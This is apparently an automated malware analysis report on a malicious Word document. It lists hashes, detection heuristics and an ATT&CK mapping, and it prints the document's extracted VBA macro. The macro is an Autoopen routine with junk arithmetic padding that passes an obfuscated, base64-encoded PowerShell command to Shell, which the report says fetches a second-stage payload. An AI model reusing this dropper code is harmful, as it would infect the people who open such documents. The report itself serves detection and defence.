Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2bf755223c742a1…

MALICIOUS

Office (OLE)

84.0 KB Created: 2018-06-07 16:57:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: d194ce187403cdf2b527014940f46fbf SHA-1: 324d5b27ec4bebed6fcfe287863f2935402383bb SHA-256: f2bf755223c742a1fcf22b0b04dce33f08365d94bab97e1707f6bb2e240ebd9d
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro with an Autoopen subroutine. This subroutine calls the Shell function, which is used to execute a command. The reconstructed command string indicates the execution of PowerShell with encoded arguments, suggesting it downloads and executes a second-stage payload. The presence of the Shell() call and the Autoopen macro are critical indicators of malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Shell-7361547-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Shell-7361547-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10932 bytes
SHA-256: 9e3541722b7a375ffdcda8b8d787698a4c848a384e1fb53ecdf1dc8ec03ea53a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XrQphZPwvdk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MTUsjcVA()
On Error Resume Next
ljzLC = Tan(NmzZGV _
* Tan(cfroEi * Int(ZzdtE * Sqr(83911) / hAXnM + Fix(68393)) / 84274 * Round(5138 / Log(50985 - aJsOSn) + 83228 - jaNAs)) _
/ 7766 + Log(48814))
zwlFGH = Tan(Fjlal _
* Tan(lkZEAO * Int(mEHMmp * Sqr(44623) / JjITO + Fix(65502)) / 69086 * Round(87873 / Log(32777 - kSwni) + 62364 - FJvqn)) _
/ 91626 + Log(84220))
MTUsjcVA = iIChAQoq + Shell(tsdtj + Chr(WXbZj + vbKeyP + dNvYN) + XKvbi + fAWjCPjRn + YrumT + iQLfw, 36301 - 36301)
isvrZT = Tan(jtwzd _
* Tan(XLBqI * Int(PvwwWa * Sqr(98876) / fcaVlQ + Fix(56922)) / 69121 * Round(79382 / Log(78424 - rBTiF) + 82925 - CFhwtz)) _
/ 59177 + Log(22504))
End Function
Sub Autoopen()
On Error Resume Next
thtYQZ = Tan(kHSaON _
* Tan(nWNoRi * Int(MrHnXt * Sqr(98661) / jbqZoj + Fix(4688)) / 91324 * Round(30747 / Log(73176 - OjbmQ) + 37896 - btbjLN)) _
/ 55671 + Log(61209))
MTUsjcVA
qlksjn = Tan(YrjpY _
* Tan(lazCwU * Int(lErUi * Sqr(34253) / FCPcw + Fix(16597)) / 5344 * Round(23496 / Log(18409 - tmbjCv) + 63144 - QhIAiJ)) _
/ 28471 + Log(17075))
End Sub



Attribute VB_Name = "vluQKOhzV"
Function XKvbi()
On Error Resume Next
wAmWXT = Tan(BNUoY _
* Tan(GJlzc * Int(ucqzH * Sqr(62788) / XaWRW + Fix(66347)) / 22365 * Round(61411 / Log(81439 - wKBbfL) + 98581 - OcNEwN)) _
/ 27827 + Log(26430))
HCzlXVWCuT = "owersH" + "eLL -e IAAoAE4A" + "ZQBXAC0A" + "bwBCAEoAZQBDAHQ" + "AI" + "AAgAHMA" + "WQBTAHQ" + "AZQBtAC4AaQBP" + "AC4AYwBPAE0AcA"
GGFCi = Tan(Svdfvz _
* Tan(NlPJm * Int(bkPRrJ * Sqr(87693) / sTiJD + Fix(17730)) / 46172 * Round(9894 / Log(49467 - zUVjfB) + 62699 - qIObo)) _
/ 74149 + Log(52269))
ZzrIqWhCk = "ByAGUA" + "cwBzAEkAbwB" + "OAC4ARABF" + "AGYAbABBAF" + "QAZQBTAHQAU" + "gBFAEEAbQAo" + "ACAAWwBTAHkAcwB"
maroNt = Tan(kZczVr _
* Tan(iILiMS * Int(rENkn * Sqr(37197) / pRirhb + Fix(43472)) / 95839 * Round(26999 / Log(70715 - EikKD) + 3925 - MBZGP)) _
/ 18766 + Log(50633))
JwMrQbuiizf = "0AEUAbQAuAEkAbw" + "AuAE0AZQBNAG8" + "AUgB" + "5AHMAd"
JuVdE = Tan(ZzvIzI _
* Tan(PSkubH * Int(jhhBL * Sqr(50008) / RLiBUR + Fix(48147)) / 34801 * Round(53249 / Log(54366 - jzijpC) + 10506 - WwjpMo)) _
/ 4517 + Log(35326))
GMaOJUMol = "AByAGUAYQBNA" + "F0AIABbA" + "FMAeQ" + "BzAFQAZQBNAC4AQ"
cNURi = Tan(HoMGcq _
* Tan(zqIJu * Int(dArfv * Sqr(34041) / fiVWN + Fix(35588)) / 97834 * Round(98978 / Log(79293 - ISCwW) + 90488 - vcDHws)) _
/ 64384 + Log(6472))
tWGlXwVo = "wBvAE" + "4Ad" + "gBlAHIAVABd" + "ADoAO" + "gBmAFIATwBtAG" + "IAQQBzA" + "EUANgA0AHM" + "AdABSAE" + "kA" + "bgB"
soZlhY = Tan(aTZSq _
* Tan(KrPIcA * Int(sLGEOj * Sqr(37263) / vjpoS + Fix(36603)) / 50254 * Round(19062 / Log(49874 - jjSbf) + 94582 - mCSLsp)) _
/ 32406 + Log(64214))
LishOz = "HACgAJwBWAFoAQ" + "gB" + "kAFQA" + "OABJAHc" + "AR"
BhiUW = Tan(Flfmkd _
* Tan(akipE * Int(QXRfJc * Sqr(53924) / BDDqYH + Fix(11328)) / 33484 * Round(86320 / Log(53243 - hiihw) + 85842 - wPchd)) _
/ 4856 + Log(71989))
SGPUcWvIkV = "gBJAGIAL" + "wBTAG" + "kAKwBXAEQA" + "QwBLAD" + "AAUQAwAFUASgBp" + "AHcAawBFAHgAQQB" + "zAE"
QpkBY = Tan(uRDibw _
* Tan(WRIrG * Int(XNlqVn * Sqr(93086) / NFTaBF + Fix(6750)) / 80912 * Round(32409 / Log(63268 - DNnQaz) + 39514 - BbzTqW)) _
/ 35208 + Log(27716))
qhYXzc = "YAaQBaAE4Ab" + "wBpA" + "EkAbgBw" + "ADEAagBO" + "AF"
XKvbi = HCzlXVWCuT + ZzrIqWhCk + JwMrQbuiizf + GMaOJUMol + tWGlXwVo + LishOz + SGPUcWvIkV + qhYXzc
End Function
Function fAWjCPjRn()
On Error Resume Next
fwPOc = Tan(hLjHa _
* Tan(HjAcAD * Int(kwKrA * Sqr(81760) / BPldDi + Fix(82421)) / 92526 * Round(21153 / Log(35119 - cawFF) + 82700 - uFtuwr)) _
/ 80986 + Log(37200))
sGnGmIBAM = "cASwBlADMAcwBE" + "AG8AeQBQAD" + "gATg" + "A4AH" + "QAQQBUAEgAZQBu" + "AE8AUwBjADk" + "AMwBuAFA" + "AbAB6AGUATwB" + "IAHIAUAA4AG0AZA"
iKUHPX = Tan(MRZGDr _
* Tan(LViKXc * Int(irTzG * 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.